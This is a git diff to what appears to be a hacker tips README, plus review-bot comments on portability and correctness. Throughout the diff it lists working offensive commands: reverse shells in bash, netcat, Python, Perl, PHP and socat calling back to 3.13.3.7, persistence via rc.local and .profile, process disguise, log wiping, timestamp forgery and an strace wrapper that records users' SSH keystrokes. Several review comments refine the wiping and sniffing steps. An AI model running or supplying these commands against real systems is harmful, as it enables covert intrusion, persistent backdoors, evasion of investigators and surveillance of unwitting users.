diff --git a/README.md b/README.md index 8b77b9f..35d7b25 100644 --- a/README.md +++ b/README.md @@ -71,13 +71,13 @@ Got tricks? Send them to root@thc.org or submit a pull request. Tell Bash to use */dev/null* instead of *~/.bash_history*. This is the first command we execute on every shell. It will stop the Bash from logging your commands. -``` -$ export HISTFILE=/dev/null +```sh +export HISTFILE=/dev/null ``` It is good housekeeping to 'commit suicide' when exiting a shell: -``` -$ alias exit='kill -9 $$' +```sh +alias exit='kill -9 $$' ``` Any command starting with a " " (space) will [not get logged to history](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces) either. @@ -87,16 +87,16 @@ $ id **1.ii. Hide your command** -``` -$ /bin/bash -c "exec -a syslogd nmap -T0 10.0.2.1/24" -or starting as a background process: -$ exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log & +```sh +/bin/bash -c "exec -a syslogd nmap -T0 10.0.2.1/24" +# or starting as a background process: +exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log & ``` Alternatively if there is no Bash: -``` -$ cp `which nmap` syslogd -$ PATH=.:$PATH syslogd -T0 10.0.2.1/24 +```sh +cp `which nmap` syslogd +PATH=.:$PATH syslogd -T0 10.0.2.1/24 ``` In this example we execute *nmap* but let it appear with the name *syslogd* in *ps alxwww* process list. 
@@ -105,17 +105,17 @@ In this example we execute *nmap* but let it appear with the name *syslogd* in * Download [zap-args.c](src/zap-args.c). This example will execute *nmap* but will make it appear as 'syslogd' without any arguments in the *ps alxww* output. -``` -$ gcc -Wall -O2 -fpic -shared -o zap-args.so zap-args.c -ldl -$ LD_PRELOAD=./zap-args.so exec -a syslogd nmap -T0 10.0.0.1/24 +```sh +gcc -Wall -O2 -fpic -shared -o zap-args.so zap-args.c -ldl +LD_PRELOAD=./zap-args.so exec -a syslogd nmap -T0 10.0.0.1/24 ``` Note: There is a gdb variant as well. Anyone? --- **2.i. Almost invisible SSH** -``` -$ ssh -o UserKnownHostsFile=/dev/null -T user@server.org "bash -i" +```sh +ssh -o UserKnownHostsFile=/dev/null -T user@server.org "bash -i" ``` This will not add your user to the */var/log/utmp* file and you won't show up in *w* or *who* command of logged in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to *~/.ssh/known_hosts*. @@ -123,8 +123,8 @@ This will not add your user to the */var/log/utmp* file and you won't show up in **2.ii SSH tunnel OUT** We use this all the time to circumvent local firewalls and IP filtering: -``` -$ ssh -g -L31337:1.2.3.4:80 user@server.org +```sh +ssh -g -L31337:1.2.3.4:80 user@server.org ``` You or anyone else can now connect to your computer on port 31337 and get tunneled to 1.2.3.4 port 80 and appear with the source IP of 'server.org'. An alternative and without the need for a server is to use [gs-netcat](#bdra-anchor). 
@@ -132,8 +132,8 @@ You or anyone else can now connect to your computer on port 31337 and get tunnel **2.iii SSH tunnel IN** We use this to give access to a friend to an internal machine that is not on the public Internet: -``` -$ ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org +```sh +ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@server.org ``` Anyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. An alternative and without the need for a server is to use [gs-netcat](#bdra-anchor). @@ -142,8 +142,8 @@ Anyone connecting to server.org:31338 will get tunneled to 192.168.0.5 on port 8 OpenSSH 7.6 adds socks support for dynamic forwarding. Example: Tunnel all your browser traffic through your server. -``` -$ ssh -D 1080 user@server.org +```sh +ssh -D 1080 user@server.org ``` Now configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is now tunneled through *server.org* and will appear with the source IP of *server.org*. An alternative and without the need for a server is to use [gs-netcat](#bdra-anchor). @@ -152,8 +152,8 @@ Now configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is This is the reverse of the above example. It give others access to your *local* network or let others use your computer as a tunnel end-point. -``` -$ ssh -g -R 1080 user@server.org +```sh +ssh -g -R 1080 user@server.org ``` The others configuring server.org:1080 as their SOCKS4/5 proxy. They can now connect to *any* computer on *any port* that your computer has access to. This includes access to computers behind your firewall that are on your local network. An alternative and without the need for a server is to use [gs-netcat](#bdra-anchor). 
@@ -162,26 +162,26 @@ The others configuring server.org:1080 as their SOCKS4/5 proxy. They can now con **3.i. ARP discover computers on the local network** -``` -$ nmap -r -sn -PR 192.168.0.1/24 +```sh +nmap -r -sn -PR 192.168.0.1/24 ``` This will Arp-ping all local machines just like *arping*. ARP ping always seems to work and is very stealthy (e.g. does not show up in the target's firewall). However, this command is by far our favourite: -``` -$ nmap -thc +```sh +nmap -thc ``` **3.ii. ICMP discover local network** ...and when we do not have nmap and we can not do broadcast pings (requires root) then we use this: -``` -$ for x in `seq 1 254`; do ping -on -c 3 -i 0.1 -W 200 192.168.1.$x | grep 'bytes from' | cut -f4 -d" " | sort -u; done +```sh +for x in `seq 1 254`; do ping -on -c 3 -i 0.1 -W 200 192.168.1.$x | grep 'bytes from' | cut -f4 -d" " | sort -u; done ``` **3.iii. Monitor all new TCP connections** -``` -# tcpdump -n "tcp[tcpflags] == tcp-syn" +```sh +tcpdump -n "tcp[tcpflags] == tcp-syn" ``` @@ -189,8 +189,8 @@ $ for x in `seq 1 254`; do ping -on -c 3 -i 0.1 -W 200 192.168.1.$x | grep 'byte Make a *bing*-noise (ascii BEL) when anyone tries to SSH to/from the target system (could be an admin!). -``` -# tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done +```sh +tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done ``` --- 
@@ -253,22 +253,22 @@ $ xxd -p -r >issue.net-COPY **4.iv. File Encoding - Multiple Binaries** Method 1: Using *shar* to create a self extracting shell script with binaries inside: -``` -$ shar *.png *.c >stuff.shar +```sh +shar *.png *.c >stuff.shar ``` Transfer *stuff.shar* to the remote system and execute it: -``` -$ chmod 700 stuff.shar -$ ./stuff.shar +```sh +chmod 700 stuff.shar +./stuff.shar ``` Method 2: Using *tar* -``` -$ tar cfz - *.png *.c | openssl base64 >stuff.tgz.b64 +```sh +tar cfz - *.png *.c | openssl base64 >stuff.tgz.b64 ``` Transfer *stuff.tgz.b64* to the remote system and execute: -``` -$ openssl base64 -d @@ -284,8 +284,8 @@ Have a *screen* running on your local computer and log into the remote system fr We use *openssl* to encode our data but any of the above encoding methods works. This command will display the base64 encoded data in the terminal and *screen* will write this data to *screen-xfer.txt*: -``` -$ openssl base64 CTRL-a H On your local computer and from a different shell decode the file: -``` -$ openssl base64 -d **4.vi. File transfer - using *screen* from LOCAL to REMOTE** On your local system (from within a different shell) encode the data: -``` -$ openssl base64 screen-xfer.txt +```sh +openssl base64 screen-xfer.txt ``` On the remote system (and from within the current *screen*): -``` -$ openssl base64 -d +```sh +openssl base64 -d ``` Get *screen* to slurp the base64 encoded data into screen's clipboard and paste the data from the clipboard to the remote system: 
@@ -327,14 +327,14 @@ Note: Two C-d are required due to a [bug in openssl](https://github.com/openssl/ **4.vii. File transfer - using gs-netcat and sftp** Use [gs-netcat](https://github.com/hackerschoice/gsocket) and encapsulate the sftp protocol within. It uses the Global Socket Relay Network and no central server or IP address is required to connect to the SFTP/Gsocket server (just a password hash). -``` -$ gs-netcat -s MySecret -l -e /usr/lib/sftp-server # Host +```sh +gs-netcat -s MySecret -l -e /usr/lib/sftp-server # Host ``` From your workstation execute this command to connect to the SFTP server: -``` -$ export GSOCKET_ARGS="-s MySecret" # Workstation -$ sftp -D gs-netcat # Workstation +```sh +export GSOCKET_ARGS="-s MySecret" # Workstation +sftp -D gs-netcat # Workstation ``` --- @@ -344,14 +344,14 @@ $ sftp -D gs-netcat # Workstation Use [gs-netcat](https://github.com/hackerschoice/gsocket). It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network. It uses 'password hashes' instead of IP addresses to connect. This means that you do not need to run your own Command & Control server for the backdoor to connect back to. If netcat is a swiss army knife than gs-netcat is a german battle axe :> -``` -$ gs-netcat -s MySecret -l -i # Host +```sh +gs-netcat -s MySecret -l -i # Host ``` Use -D to start the reverse shell in the background (daemon) and with a watchdog to auto-restart if killed. To connect to the shell from your workstation: -``` -$ gs-netcat -s MySecret -i +```sh +gs-netcat -s MySecret -i ``` Use -T to tunnel trough TOR. 
@@ -359,13 +359,13 @@ Use -T to tunnel trough TOR. **5.i.b. Reverse shell with Bash** Start netcat to listen on port 1524 on your system: -``` -$ nc -nvlp 1524 +```sh +nc -nvlp 1524 ``` On the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt: -``` -$ setsid bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 & +```sh +setsid bash -i &>/dev/tcp/3.13.3.7/1524 0>&1 & ``` 
@@ -375,49 +375,49 @@ Embedded systems do not always have Bash and the */dev/tcp/* trick will not work On the remote system: -``` -$ nc -e /bin/bash -vn 3.13.3.7 1524 +```sh +nc -e /bin/bash -vn 3.13.3.7 1524 ``` Variant if *'-e'* is not supported: -``` -$ mkfifo /tmp/.io -$ sh -i 2>&1 /tmp/.io +```sh +mkfifo /tmp/.io +sh -i 2>&1 /tmp/.io ``` Telnet variant: -``` -$ mkfifo /tmp/.io -$ sh -i 2>&1 /tmp/.io +```sh +mkfifo /tmp/.io +sh -i 2>&1 /tmp/.io ``` Telnet variant when mkfifo is not supported (Ulg!): -``` -$ (touch /dev/shm/.fio; sleep 60; rm -f /dev/shm/.fio) & -$ tail -f /dev/shm/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/dev/shm/.fio +```sh +(touch /dev/shm/.fio; sleep 60; rm -f /dev/shm/.fio) & +tail -f /dev/shm/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/dev/shm/.fio ``` Note: Use */tmp/.fio* if */dev/shm* is not available. Note: This trick logs your commands to a file. The file will be *unlinked* from the fs after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. **5.i.d. Reverse shell with Python** -``` -$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' +```sh +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.13.3.7",1524));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` **5.i.e. 
Reverse shell with Perl** -``` +```sh # method 1 -$ perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +perl -e 'use Socket;$i="3.13.3.7";$p=1524;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' # method 2 -$ perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' +perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"3.13.3.7:1524");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' ``` **5.i.e. Reverse shell with PHP** -``` +```sh php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");' ``` @@ -427,15 +427,15 @@ php -r '$sock=fsockopen("3.13.3.7",1524);exec("/bin/bash -i <&3 >&3 2>&3");' Any of the above reverse shells are limited. For example *sudo bash* or *top* will not work. To make these work we have to upgrade the shell to a real PTY shell: -``` -$ exec script -qc /bin/bash /dev/null # Linux -$ exec script -q /dev/null /bin/bash # BSD +```sh +exec script -qc /bin/bash /dev/null # Linux +exec script -q /dev/null /bin/bash # BSD ``` Or: -``` +```sh # Python -$ exec python -c 'import pty; pty.spawn("/bin/bash")' +exec python -c 'import pty; pty.spawn("/bin/bash")' ``` 
@@ -443,19 +443,19 @@ $ exec python -c 'import pty; pty.spawn("/bin/bash")' ...and if we also like to use Ctrl-C etc then we have to go all the way and upgrade the reverse shell to a real fully colorful interactive shell: -``` +```sh # On the target host spwan a PTY using any of the above examples: -$ python -c 'import pty; pty.spawn("/bin/bash")' +python -c 'import pty; pty.spawn("/bin/bash")' # Now Press Ctrl-Z to suspend the connection and return to your own terminal. # On your terminal execute: -$ stty raw -echo; fg +stty raw -echo; fg # On target host -$ reset -$ export SHELL=bash -$ export TERM=xterm-256color -$ stty rows 24 columns 80 +reset +export SHELL=bash +export TERM=xterm-256color +stty rows 24 columns 80 ``` @@ -463,7 +463,7 @@ $ stty rows 24 columns 80 ...or install socat and get it done without much fiddling about: -``` +```sh # on attacker's host (listener) socat file:`tty`,raw,echo=0 tcp-listen:1524 # on target host (reverse shell) @@ -477,17 +477,17 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:3.13.3.7:1524 A reverse shell that keeps trying to connect back to us every 3600 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected. -``` -$ while :; do setsid bash -i &>/dev/tcp/3.13.3.7/1524 0>&1; sleep 3600; done &>/dev/null & +```sh +while :; do setsid bash -i &>/dev/tcp/3.13.3.7/1524 0>&1; sleep 3600; done &>/dev/null & ``` or add to */etc/rc.local*: -``` +```sh nohup bash -c 'while :; do setsid bash -i &>/dev/tcp/3.13.3.7/1524 0>&1; sleep 3600; done' &>/dev/null & ``` or the user's *~/.profile* (also stops multiple instances from being started): -``` +```sh fuser /dev/shm/.busy &>/dev/null if [ $? -eq 1 ]; then nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3/dev/tcp/3.13.3.7/1524 0>&1 ; sleep 3600; done' &>/dev/null & 
@@ -517,16 +517,16 @@ c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu Install [gs-netcat](https://github.com/hackerschoice/gsocket). It creates a SOCKS relay on the Host's private lan which is accessible through the Global Relay network without the need to run your own server (e.g. directly from your workstation): -``` -$ gs-netcat -l -S # compromised Host +```sh +gs-netcat -l -S # compromised Host ``` Now from your workstation you can connect to ANY host on the Host's private LAN: -``` -$ gs-netcat -p 1080 # Your workstation. +```sh +gs-netcat -p 1080 # Your workstation. -Access route.local:22 on the Host's private LAN from your Workstation: -$ socat - "SOCKS4a:127.1:route.local:22" +# Access route.local:22 on the Host's private LAN from your Workstation: +socat - "SOCKS4a:127.1:route.local:22" ``` Use -T to use TOR. @@ -536,14 +536,14 @@ Use -T to use TOR. **7.i. Shred & Erase a file** -``` -$ shred -z foobar.txt +```sh +shred -z foobar.txt ``` **7.ii. Shred & Erase without *shred*** -``` -$ FN=foobar.txt; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom >"${FN}"; rm -f "${FN}" +```sh +FN=foobar.txt; dd bs=1k count="`du -sk \"${FN}\" | cut -f1`" if=/dev/urandom >"${FN}"; rm -f "${FN}" ``` Note: Or deploy your files in */dev/shm* directory so that no data is written to the harddrive. Data will be deleted on reboot. 
@@ -554,22 +554,22 @@ Note: Or delete the file and then fill the entire harddrive with /dev/urandom an Let's say you have modified */etc/passwd* but the file date now shows that */etc/passwd* has been modifed. Use *touch* to change the file data to the date of another file (in this example, */etc/shadow*) -``` -$ touch -r /etc/shadow /etc/passwd +```sh +touch -r /etc/shadow /etc/passwd ``` **7.iv. Clear logfile** This will reset the logfile to 0 without having to restart syslogd etc: -``` -# cat /dev/null >/var/log/auth.log +```sh +cat /dev/null >/var/log/auth.log ``` This will remove any sign of us from the log file: -``` -# cd /dev/shm -# grep -v 'thc\.org' /var/log/auth.log >a.log; cat a.log >/var/log/auth.log; rm -f a.log +```sh +cd /dev/shm +grep -v 'thc\.org' /var/log/auth.log >a.log; cat a.log >/var/log/auth.log; rm -f a.log ``` @@ -580,24 +580,24 @@ Our favorite working directory is */dev/shm/*. This location is volatile memory Hiding permanent files: Method 1: -``` -$ alias ls='ls -I system-dev' +```sh +alias ls='ls -I system-dev' ``` This will hide the directory *system-dev* from the *ls* command. Place in User's *~/.profile* or system wide */etc/profile*. Method 2: Tricks from the 80s. Consider any directory that the admin rarely looks into (like */boot/.X11/..* or so): -``` -$ mkdir '...' -$ cd '...' +```sh +mkdir '...' +cd '...' ``` Method 3: Unix allows filenames with about any ASCII character but 0x00. Try tab (*\t*). Happens that most Admins do not know how to cd into any such directory. -``` -$ mkdir $'\t' -$ cd $'\t' +```sh +mkdir $'\t' +cd $'\t' ``` @@ -606,14 +606,14 @@ $ cd $'\t' Good for quick passwords without human element. -``` -$ openssl rand -base64 24 +```sh +openssl rand -base64 24 ``` If `openssl` is not available then we can also use `head` to read from `/dev/urandom`. -``` -$ head -c 32 < /dev/urandom | xxd -p -c 32 +```sh +head -c 32 < /dev/urandom | xxd -p -c 32 ``` 
@@ -621,27 +621,27 @@ $ head -c 32 < /dev/urandom | xxd -p -c 32 Create a 256MB large encrypted file system. You will be prompted for a password. -``` -$ dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock -$ cryptsetup luksFormat /tmp/crypted -$ mkfs.ext3 /tmp/crypted +```sh +dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock +cryptsetup luksFormat /tmp/crypted +mkfs.ext3 /tmp/crypted ``` Mount: -``` -# losetup -f -# losetup /dev/loop0 /tmp/crypted -# cryptsetup open /dev/loop0 crypted -# mount -t ext3 /dev/mapper/crypted /mnt/crypted +```sh +losetup -f +losetup /dev/loop0 /tmp/crypted +cryptsetup open /dev/loop0 crypted +mount -t ext3 /dev/mapper/crypted /mnt/crypted ``` Store data in `/mnt/crypted`, then unmount: -``` -# umount /mnt/crypted -# cryptsetup close crypted -# losetup -d /dev/loop0 +```sh +umount /mnt/crypted +cryptsetup close crypted +losetup -d /dev/loop0 ``` @@ -650,21 +650,21 @@ Store data in `/mnt/crypted`, then unmount: Encrypt your 0-Days and log files before transfering them - please. (and pick your own password): Encrypt: -``` -$ openssl enc -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.txt.enc +```sh +openssl enc -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.txt.enc ``` Decrypt: -``` -$ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.txt +```sh +openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.txt ``` --- **9.i. Sniff a user's SSH session** -``` -$ strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done +```sh +strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done ``` Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control. 
@@ -672,8 +672,8 @@ Dirty way to monitor a user who is using *ssh* to connect to another host from a **9.ii Sniff a user's SSH session without strace** The tool 'script' has been part of Unix for decades. Add 'script' to the user's .profile. The user's keystrokes and session will be recorded to ~/.ssh-log.txt the next time the user logs in: -``` -$ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile +```sh +echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile ``` Consider using [zap-args](#hya-anchor) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host. @@ -683,7 +683,7 @@ Consider using [zap-args](#hya-anchor) to hide the the arguments and /dev/tcp/3. Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH clients unless uid=0) Create a wrapper script called 'ssh' that executes strace + ssh to log the session: -``` +```sh # Cut & Paste the following into a bash shell: # Add a local path to the PATH variable so our 'ssh' is executed instead of the real ssh: echo 'PATH=~/.local/bin:$PATH #0xFD0E' >>~/.profile @@ -691,9 +691,9 @@ echo 'PATH=~/.local/bin:$PATH #0xFD0E' >>~/.profile # Create a log directory and our own ssh binary mkdir -p ~/.local/bin ~/.local/logs -cat <<__EOF__>~/.local/bin/ssh +cat <<__EOF__ >~/.local/bin/ssh #! /bin/bash -strace -e trace=read -o '! ~/.local/bin/ssh-log \$\$' /usr/bin/ssh \$@ +strace -e trace=read -I 1 -o '! ~/.local/bin/ssh-log \$\$' /usr/bin/ssh \$@ __EOF__ cat <<__EOF__ >~/.local/bin/ssh-log 
@@ -712,10 +712,8 @@ echo -e "\033[1;32m***SUCCESS***. Logfiles stored in ~/.local/.logs/. To uninstall cut & paste this\033[0m:\033[1;36m grep -v 0xFD0E ~/.profile >~/.profile-new && mv ~/.profile-new ~/.profile - rm -rf ~/.local/bin/ssh ~/.local/bin/ssh-log - rmdir ~/.local/bin ~/.local &>/dev/null - rm -rf ~/.local/logs/ssh-log*.txt - rmdir ~/.local/logs &>/dev/null\033[0m" + rm -rf ~/.local/bin/ssh ~/.local/bin/ssh-log ~/.local/logs/ssh-log*.txt + rmdir ~/.local/bin ~/.local/logs ~/.local &>/dev/null \033[0m" ``` (thanks to Gerald for testing this) @@ -727,13 +725,13 @@ The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the u Hacking over long latency links or slow links can be frustrating. Every keystroke is transmitted one by one and any typo becomes so much more frustrating and time consuming to undo. *rlwrap* comes to the rescue. It buffers all single keystrokes until *Enter* is hit and then transmits the entire line at once. This makes it so much easier to type at high speed, correct typos, ... Example for the receiving end of a revese tunnel: -``` -$ rlwrap nc -vnlp 1524 +```sh +rlwrap nc -vnlp 1524 ``` Example for *SSH*: -``` -$ rlwrap ssh user@host +```sh +rlwrap ssh user@host ``` ---
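Review bot: style nit in hunk @@ -87: the re-fenced block keeps legacy backtick substitution, `cp \`which nmap\` syslogd`. `cp "$(command -v nmap)" syslogd` is the POSIX form, and `command -v` also works on stripped-down systems where `which` is not installed, which matters for a variant introduced with "if there is no Bash".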
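Review bot: the ping loop in hunk @@ -162 is not portable across the systems this section is aimed at. `-o` (exit after the first reply) is a BSD/macOS flag that Linux iputils ping rejects, `-W` takes milliseconds on macOS but seconds on Linux (so `-W 200` waits over three minutes per unreachable host there), and on Linux `-i 0.1` is only allowed for root. A comment stating which ping the line was written for, or a second Linux variant, would save readers a confusing failure.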
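Review bot: context lines in hunk @@ -344 carry two typos that could be fixed while the fences are being retouched: "swiss army knife than gs-netcat" should read "then", and "tunnel trough TOR" should read "through".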
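Review bot: the dd variant in hunk @@ -536 does not overwrite the file's data blocks. `dd ... if=/dev/urandom >"${FN}"` opens the file through a shell redirection, which truncates it to zero length before dd writes a byte, so the filesystem is free to allocate fresh blocks for the random data while the original blocks are merely released and stay recoverable. Use dd's own output handling, `of="${FN}" conv=notrunc`, so the existing blocks are rewritten in place, and it is worth adding the same caveat shred's manual gives: on journaling, copy-on-write or snapshotting filesystems and on flash media neither command guarantees the old data is gone.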
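Review bot: the `touch -r /etc/shadow /etc/passwd` line in hunk @@ -554 only copies atime and mtime. It cannot set ctime, which the kernel updates to the current time on every inode change, the touch itself included, so `stat /etc/passwd` still shows a fresh Change time, and that is the field integrity checkers and forensic timelines compare. A one-line note under the example would stop readers assuming all three timestamps are aligned.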
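Review bot: the fence tag chosen in hunk @@ -580 (and used throughout the patch) is `sh`, but `mkdir $'\t'` and `cd $'\t'` depend on `$'...'` ANSI-C quoting, which POSIX sh does not provide; under dash the first line creates a directory literally named `$\t`. Either tag such blocks `bash` or state in the text that bash/ksh/zsh is assumed. The same applies to the `&>` and `/dev/tcp` redirections in hunks @@ -359 and @@ -477, which are bash-only as well.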
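Review bot: the command order in hunk @@ -621 formats the wrong device. `mkfs.ext3 /tmp/crypted` runs straight after `cryptsetup luksFormat /tmp/crypted`, so ext3 is written over the LUKS header in the container file instead of inside the encrypted mapping. The filesystem has to be created on the opened mapping: move the mkfs step into the Mount block after `cryptsetup open /dev/loop0 crypted` and make it `mkfs.ext3 /dev/mapper/crypted`. In the same block, `losetup -f` only prints the next free loop device while the following line hard-codes `/dev/loop0`, which is correct only if that device happened to be free; `losetup -f --show /tmp/crypted` returns the device it actually attached, and that value should be used for `cryptsetup open` and `losetup -d`.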
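Review bot: hunk @@ -650 keeps the passphrase on the command line with `-k fOUGsg1BJdXPt0CY4I`, so it is visible to every local user through `ps` and `/proc/*/cmdline` for the duration of the run and lands in shell history unless the HISTFILE tip at the top of the file was applied first. `openssl enc` accepts `-pass env:VAR`, `-pass file:path` and `-kfile path`, all of which keep the secret out of the argument list; one of those should be shown instead. `-pbkdf2` is the right choice and should stay.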
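Review bot: in hunk @@ -691 the generated wrapper passes its arguments unquoted: `/usr/bin/ssh \$@` inside the heredoc becomes `$@` in the script, which re-splits any argument containing whitespace (a remote command such as `ssh host "ls -la /tmp"` arrives as three separate arguments). It should be `"\$@"`. The newly added `-I 1` changes strace's signal handling (strace becomes interruptible at any point instead of blocking fatal signals while a program is traced with `-o`) but carries no comment explaining why; a short comment would save the next reader a trip to the man page. The spacing fix in `cat <<__EOF__ >~/.local/bin/ssh` is good.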
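Review bot: the success message in hunk @@ -712 still says `Logfiles stored in ~/.local/.logs/`, and the context line of hunk @@ -727 says `logged to *~/.ssh/logs/*`, but the wrapper created in hunk @@ -691 writes to `~/.local/logs` (`mkdir -p ~/.local/bin ~/.local/logs`). Both strings should read `~/.local/logs/`. The merged uninstall lines themselves are fine; the only nit is the stray space before `\033[0m` at the end of the rmdir line.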